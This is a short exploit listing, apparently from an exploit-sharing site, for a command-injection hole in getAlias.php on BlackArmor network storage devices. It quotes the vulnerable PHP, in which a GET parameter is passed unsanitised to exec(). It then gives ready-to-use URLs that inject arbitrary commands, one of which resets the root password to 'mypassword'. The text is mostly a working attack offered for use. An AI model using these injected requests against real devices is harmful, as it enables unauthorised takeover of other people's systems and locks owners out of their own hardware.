Exploit for hardware platform in category web applications
# The file getAlias.php located in /backupmgt has the following lines:
#
# $ipAddress = $_GET["ip";
# if ($ipAddress != "") {
# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
# ..
# ..
# }
#
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
#
## Proof of Concept:
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
command here>;
#
## Example to change the root password to 'mypassword':
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;
# 0day.today [2018-04-08] #